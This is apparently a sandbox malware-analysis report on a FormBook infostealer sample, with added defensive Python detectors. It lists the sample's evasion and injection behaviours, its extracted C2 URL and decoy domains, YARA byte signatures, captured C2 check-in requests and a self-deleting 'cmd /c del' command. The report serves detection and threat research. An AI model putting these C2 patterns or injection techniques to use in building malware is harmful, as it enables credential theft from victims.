
Analysis Report UOMp9cDcqZ

Overview

General Information

Sample Name: UOMp9cDcqZ (renamed file extension from none to exe)
Analysis ID: 433343
MD5: 15d907e7d9f8286e5053796c9d78fcec
SHA1: b7d7329e94e2292ed53e2778cebec533ac599030
SHA256: 771e4f69520f71afe6a6e9a4eb4de7dcd8d7521d90db290ca6c27b1a95c532af
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • UOMp9cDcqZ.exe (PID: 5852, cmdline: 'C:\Users\user\Desktop\UOMp9cDcqZ.exe', MD5: 15D907E7D9F8286E5053796C9D78FCEC)
    • UOMp9cDcqZ.exe (PID: 6412, cmdline: C:\Users\user\Desktop\UOMp9cDcqZ.exe, MD5: 15D907E7D9F8286E5053796C9D78FCEC)
      • explorer.exe (PID: 3472, cmdline: (empty), MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autochk.exe (PID: 4860, cmdline: C:\Windows\SysWOW64\autochk.exe, MD5: 34236DB574405291498BCD13D20C42EB)
        • colorcpl.exe (PID: 4840, cmdline: C:\Windows\SysWOW64\colorcpl.exe, MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 6444, cmdline: /c del 'C:\Users\user\Desktop\UOMp9cDcqZ.exe', MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5880, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
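The tree above shows three things a detection engineer would want to pick out of endpoint telemetry: the sample launching a second copy of its own image (the suspended-mode creation and hollowing signatures listed above), explorer.exe starting SysWOW64 utilities with no arguments, and cmd.exe deleting the original file. The following is an added example, not part of the Joe Sandbox report: it evaluates those three checks over process-create events constructed from the tree. The image paths of explorer.exe and cmd.exe are assumed, since the report gives only their names, and the explorer.exe edge is how the sandbox draws code injection; in a Sysmon log explorer.exe would keep its real parent and the injection would have to be correlated separately.

```python
"""Added example, not part of the Joe Sandbox report: evaluate a process tree
for three behaviours the tree above shows. Events are constructed from that
tree; the explorer.exe and cmd.exe image paths are assumed."""
import re
from typing import Dict, List, Set, Tuple

SAMPLE_IMAGE = r"C:\Users\user\Desktop\UOMp9cDcqZ.exe"

EVENTS = [  # constructed from the process tree above
    {"pid": 5852, "ppid": None, "image": SAMPLE_IMAGE, "cmdline": f"'{SAMPLE_IMAGE}'"},
    {"pid": 6412, "ppid": 5852, "image": SAMPLE_IMAGE, "cmdline": SAMPLE_IMAGE},
    # injection edge as drawn by the sandbox; explorer.exe path is assumed
    {"pid": 3472, "ppid": 6412, "image": r"C:\Windows\explorer.exe", "cmdline": ""},
    {"pid": 4860, "ppid": 3472, "image": r"C:\Windows\SysWOW64\autochk.exe",
     "cmdline": r"C:\Windows\SysWOW64\autochk.exe"},
    {"pid": 4840, "ppid": 3472, "image": r"C:\Windows\SysWOW64\colorcpl.exe",
     "cmdline": r"C:\Windows\SysWOW64\colorcpl.exe"},
    # cmd.exe path is assumed (32-bit parent, so the SysWOW64 copy)
    {"pid": 6444, "ppid": 4840, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": f"/c del '{SAMPLE_IMAGE}'"},
    {"pid": 5880, "ppid": 6444, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# `del <path>` with an optional quote on either side of the path.
DEL_RE = re.compile(r"\bdel\s+['\"]?([^'\"]+?)['\"]?\s*$", re.IGNORECASE)


def build_index(events) -> Dict[int, dict]:
    return {e["pid"]: e for e in events}


def ancestor_images(pid: int, by_pid: Dict[int, dict]) -> Set[str]:
    """Lower-cased image paths of every ancestor of pid; stops at a root,
    an unknown parent, or a cycle."""
    images, seen = set(), set()
    cur = by_pid.get(pid)
    while cur is not None and cur["ppid"] is not None and cur["ppid"] not in seen:
        seen.add(cur["ppid"])
        cur = by_pid.get(cur["ppid"])
        if cur is not None:
            images.add(cur["image"].lower())
    return images


def bare_cmdline(e: dict) -> bool:
    """True when the command line is empty or is only the image path."""
    cl = e["cmdline"].strip().strip("'\"").lower()
    return cl in ("", e["image"].lower())


def analyse(events) -> List[Tuple[str, int]]:
    by_pid = build_index(events)
    findings: List[Tuple[str, int]] = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        image = e["image"].lower()
        # 1. A process launching a second copy of its own image, consistent with
        #    the suspended-mode creation and hollowing signatures in the report.
        if parent and parent["image"].lower() == image:
            findings.append(("self-relaunch", e["pid"]))
        # 2. explorer.exe starting a SysWOW64 utility with no arguments.
        if parent and parent["image"].lower().endswith("\\explorer.exe") \
                and "\\syswow64\\" in image and bare_cmdline(e):
            findings.append(("explorer-spawns-bare-syswow64-utility", e["pid"]))
        # 3. cmd.exe deleting a file that is the image of one of its ancestors.
        if image.endswith("\\cmd.exe"):
            m = DEL_RE.search(e["cmdline"])
            if m and m.group(1).strip().lower() in ancestor_images(e["pid"], by_pid):
                findings.append(("self-delete-of-ancestor-image", e["pid"]))
    return findings


if __name__ == "__main__":
    for kind, pid in analyse(EVENTS):
        print(f"{pid:>5}  {kind}")
```

Check 3 matches only when the deleted path belongs to an ancestor, so a plain `cmd /c del` of an unrelated file does not fire; check 2 deliberately ignores the injection edge itself, because that edge is not something a process-create event would carry.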

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
  Strings:
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp
  Rule: JoeSecurity_AntiVM_3; Description: Yara detected AntiVM_3; Author: Joe Security
Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
(21 entries in total; only the first are reproduced here)

Unpacked PEs

Source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
  Strings:
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
    • 0x10aa68:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x10adf2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x131c88:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x132012:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x116b05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13dd25:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x1165f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x13d811:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x116c07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x13de27:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x116d7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x13df9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x10b80a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x132a2a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x11586c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x13ca8c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x10c582:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1337a2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x11bbf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x142e17:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x11cc9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(10 entries in total; only the first are reproduced here)
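The strings the two community rules match on are short, fixed byte sequences: the JPCERT/CC rule's three strings are each a `push imm32` (opcode 68) of an API-name hash, and the yara-signator rule's $sequence_0 is `add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax`, the timing measurement behind the "detect virtualization through RDTSC" signature above. The following is an added example, not part of the Joe Sandbox report, that scans a buffer for those patterns the way YARA's plain hex strings would and decodes the pushed immediates. The byte patterns are copied from the matches listed under Memory Dumps and Unpacked PEs; the buffer, and so the offsets it yields, is constructed here, and the JPCERT/CC rule's condition is not shown in the report, so `all of them` is assumed.

```python
"""Added example, not part of the Joe Sandbox report: a minimal matcher for
the hex strings reported by the two community YARA rules above, run over a
constructed buffer. Condition `all of them` for the JPCERT/CC rule is assumed."""
import re
import struct
from typing import Dict, List, Optional

# Hex strings copied from the rule matches above.
PATTERNS: Dict[str, str] = {
    # JPCERT/CC rule: each is `push imm32`; the identifiers name sqlite3 functions.
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
    # yara-signator rule: add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax
    "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "$sequence_8": "3C 54 74 04 3C 74 75 F4",
}


def hex_to_bytes(hexs: str) -> bytes:
    return bytes.fromhex(hexs.replace(" ", ""))


def scan(buf: bytes, patterns: Dict[str, str] = PATTERNS) -> Dict[str, List[int]]:
    """Offsets of every occurrence of every pattern, overlapping matches
    included, which is how YARA reports plain hex strings."""
    hits: Dict[str, List[int]] = {}
    for ident, hexs in patterns.items():
        needle = re.escape(hex_to_bytes(hexs))
        offsets = [m.start() for m in re.finditer(b"(?=" + needle + b")", buf)]
        if offsets:
            hits[ident] = offsets
    return hits


def push_imm32(hexs: str) -> Optional[int]:
    """For a 5-byte `68 xx xx xx xx` pattern return the little-endian immediate."""
    raw = hex_to_bytes(hexs)
    if len(raw) == 5 and raw[0] == 0x68:
        return struct.unpack("<I", raw[1:])[0]
    return None


def matches_jpcert_rule(buf: bytes) -> bool:
    """Assumed condition `all of them` over the three sqlite3 hash pushes."""
    hits = scan(buf)
    return all(k in hits for k in ("$sqlite3step", "$sqlite3text", "$sqlite3blob"))


# Constructed buffer: NOP padding, the three hash pushes, INT3 padding, the RDTSC sequence.
SAMPLE = (b"\x90" * 16
          + hex_to_bytes(PATTERNS["$sqlite3step"]) + b"\x00" * 7
          + hex_to_bytes(PATTERNS["$sqlite3text"])
          + hex_to_bytes(PATTERNS["$sqlite3blob"])
          + b"\xcc" * 32
          + hex_to_bytes(PATTERNS["$sequence_0"]))

if __name__ == "__main__":
    for ident, offsets in scan(SAMPLE).items():
        imm = push_imm32(PATTERNS[ident])
        note = f"  push 0x{imm:08X}" if imm is not None else ""
        print(f"{ident:13s} {[hex(o) for o in offsets]}{note}")
    print("JPCERT/CC Formbook rule:", matches_jpcert_rule(SAMPLE))
```

The decoded immediates (0xE17B1C34, 0xC5902A38, 0x8C7FD853) are what to look for when the code has been relocated or the surrounding bytes differ: a rule keyed on `push <hash>` survives recompilation of everything around it, which is why the same three strings match at different offsets in the memory dump and in the 1.2 unpacked PE above.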

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp; Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: UOMp9cDcqZ.exe; Virustotal: Detection: 16%
Source: UOMp9cDcqZ.exe; Metadefender: Detection: 22%
Source: UOMp9cDcqZ.exe; ReversingLabs: Detection: 50%
Yara detected FormBook
Source: Yara match; File source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: UOMp9cDcqZ.exe; Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Source: UOMp9cDcqZ.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: UOMp9cDcqZ.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\ESxPeVCqHk\src\obj\x86\Debug\OrderablePartitioner.pdb; source: UOMp9cDcqZ.exe
Source: Binary string: colorcpl.pdbGCTL; source: UOMp9cDcqZ.exe, 00000002.00000002.315780630.0000000001350000.00000040.00000001.sdmp
Source: Binary string: colorcpl.pdb; source: UOMp9cDcqZ.exe, 00000002.00000002.315780630.0000000001350000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP; source: UOMp9cDcqZ.exe, 00000002.00000003.245683230.0000000001050000.00000004.00000001.sdmp, colorcpl.exe, 0000000F.00000002.494600161.00000000046D0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb; source: UOMp9cDcqZ.exe, colorcpl.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe; Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe; Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49728 -> 52.58.78.16:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49728 -> 52.58.78.16:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49728 -> 52.58.78.16:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.adultpeace.com/p2io/
Source: global traffic; HTTP traffic detected: GET /p2io/?Y8a0dZ=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21bBg/43M0dy&1bE03H=2d8HJVh0mNdP HTTP/1.1; Host: www.yunlimall.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /p2io/?Y8a0dZ=QtqXFq7FP4KHNfY3GXms050Yi4WsLwGmbp3RpBBisdkFhqTaD+AYMAmq/Gwss1AnwPhT&1bE03H=2d8HJVh0mNdP HTTP/1.1; Host: www.dmgt4m2g8y2uh.net; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /p2io/?Y8a0dZ=ywi4HDlAhD4tPbY4K6H+rd6B6cynTULkanWCLCIOcA07eHcJTX4js3v63TFqYuac8Mmv&1bE03H=2d8HJVh0mNdP HTTP/1.1; Host: www.thesoulrevitalist.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /p2io/?Y8a0dZ=bSK1RxPJHkVUetqtOJ2LeA3okZHmhG3V4GZ2PZxkhAIUk0ADTbWPbz8cbf4qMx2ahmc0&1bE03H=2d8HJVh0mNdP HTTP/1.1; Host: www.newmopeds.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /p2io/?Y8a0dZ=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf074xZPwGcUa1&1bE03H=2d8HJVh0mNdP HTTP/1.1; Host: www.cleanxcare.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /p2io/?Y8a0dZ=WcJiaxtbpXoyrp727GVLONmwQJizIxitcLbcPZwW7N+bpIkBoEIsPrx61ns7CFIdu3au&1bE03H=2d8HJVh0mNdP HTTP/1.1; Host: www.hazard-protection.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View; IP Address: 52.58.78.16
Source: Joe Sandbox View; ASN Name: AMAZON-02US
Source: Joe Sandbox View; ASN Name: EGIHOSTINGUS
Source: Joe Sandbox View; ASN Name: BIT-ISLEEquinixJpapanEnterpriseKKJP
Source: unknown; DNS traffic detected: queries for: clientconfig.passport.net
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Server: Microsoft-IIS/10.0; X-Powered-By: ASP.NET; Access-Control-Allow-Origin: *; Access-Control-Allow-Credentials: true; Access-Control-Allow-Methods: GET, POST, PUT, DELETE; Access-Control-Allow-Headers: Authorization; Date: Fri, 11 Jun 2021 14:58:19 GMT; Connection: close; Content-Length: 1245; Data: hex dump (cut off in this copy) that decodes to the standard IIS "404 - File or directory not found." HTML page
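Every observed request above shares the path /p2io/ from the extracted C2 entry and the same second query parameter (1bE03H=2d8HJVh0mNdP), has no User-Agent, and rotates the Host header through domains from the decoy list rather than the C2 host itself. The following is an added example, not part of the Joe Sandbox report, that scores captured HTTP requests against those four indicators using the extracted configuration. The six requests are the ones listed above; the seventh is a constructed benign request for contrast; the decoy list is a subset of the 64 domains in the configuration block, and the threshold of three indicators is this example's own choice.

```python
"""Added example, not part of the Joe Sandbox report: classify captured HTTP
requests against the FormBook configuration extracted above. The decoy list
is a subset of the report's; the 3-of-4 threshold is this example's choice."""
from typing import Dict, List, Set
from urllib.parse import parse_qsl, urlsplit

CONFIG = {
    "C2 list": ["www.adultpeace.com/p2io/"],
    "decoy": ["yunlimall.com", "dmgt4m2g8y2uh.net", "thesoulrevitalist.com",
              "newmopeds.com", "cleanxcare.com", "hazard-protection.com"],
}


def _req(query: str, host: str) -> str:
    """Rebuild a request exactly as the report shows it: no User-Agent, Connection: close."""
    return f"GET /p2io/?{query} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"


REQUESTS = [
    _req("Y8a0dZ=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21bBg/43M0dy&1bE03H=2d8HJVh0mNdP", "www.yunlimall.com"),
    _req("Y8a0dZ=QtqXFq7FP4KHNfY3GXms050Yi4WsLwGmbp3RpBBisdkFhqTaD+AYMAmq/Gwss1AnwPhT&1bE03H=2d8HJVh0mNdP", "www.dmgt4m2g8y2uh.net"),
    _req("Y8a0dZ=ywi4HDlAhD4tPbY4K6H+rd6B6cynTULkanWCLCIOcA07eHcJTX4js3v63TFqYuac8Mmv&1bE03H=2d8HJVh0mNdP", "www.thesoulrevitalist.com"),
    _req("Y8a0dZ=bSK1RxPJHkVUetqtOJ2LeA3okZHmhG3V4GZ2PZxkhAIUk0ADTbWPbz8cbf4qMx2ahmc0&1bE03H=2d8HJVh0mNdP", "www.newmopeds.com"),
    _req("Y8a0dZ=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf074xZPwGcUa1&1bE03H=2d8HJVh0mNdP", "www.cleanxcare.com"),
    _req("Y8a0dZ=WcJiaxtbpXoyrp727GVLONmwQJizIxitcLbcPZwW7N+bpIkBoEIsPrx61ns7CFIdu3au&1bE03H=2d8HJVh0mNdP", "www.hazard-protection.com"),
    # Constructed benign request: unrelated path and host, and it sends a User-Agent.
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\nConnection: close\r\n\r\n",
]


def c2_paths(config: dict) -> Set[str]:
    """'www.adultpeace.com/p2io/' -> {'/p2io/'}: the path every check-in reuses."""
    return {"/" + e.split("/", 1)[1] for e in config["C2 list"] if "/" in e}


def config_hosts(config: dict) -> Set[str]:
    """C2 host plus every decoy, with and without the www. prefix the traffic shows."""
    hosts = {e.split("/", 1)[0] for e in config["C2 list"]}
    for d in config["decoy"]:
        hosts.update({d, "www." + d})
    return hosts


def parse_request(raw: str) -> dict:
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def classify(raw: str, config: dict = CONFIG) -> dict:
    """Score one request against the four indicators seen in the traffic above."""
    req = parse_request(raw)
    url = urlsplit(req["target"])
    params = parse_qsl(url.query, keep_blank_values=True)
    host = req["headers"].get("host", "")
    reasons: List[str] = []
    if url.path in c2_paths(config):
        reasons.append("path matches C2 configuration path " + url.path)
    if host in config_hosts(config):
        reasons.append("Host is in the C2/decoy list")
    if "user-agent" not in req["headers"]:
        reasons.append("no User-Agent header")
    if req["method"] == "GET" and len(params) == 2:
        reasons.append("two-parameter GET, second value " + params[1][1])
    marker = params[1][1] if len(params) == 2 else None
    return {"host": host, "path": url.path, "marker": marker,
            "reasons": reasons, "suspicious": len(reasons) >= 3}


def group_by_marker(raws: List[str], config: dict = CONFIG) -> Dict[str, List[str]]:
    """Hosts sharing the constant second parameter value; all six requests above share one."""
    groups: Dict[str, List[str]] = {}
    for raw in raws:
        r = classify(raw, config)
        if r["suspicious"]:
            groups.setdefault(r["marker"], []).append(r["host"])
    return groups


if __name__ == "__main__":
    for raw in REQUESTS:
        r = classify(raw)
        print(f'{r["host"]:28s} suspicious={r["suspicious"]}  {"; ".join(r["reasons"])}')
    print(group_by_marker(REQUESTS))
```

Matching on the path and the missing User-Agent rather than on the Host is deliberate: the Host values here are all decoys, so a blocklist built from them alone would miss the same sample talking to www.adultpeace.com, while the path and request shape stay constant across every destination.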
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: UOMp9cDcqZ.exe, 00000001.00000002.248963538.0000000002B61000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
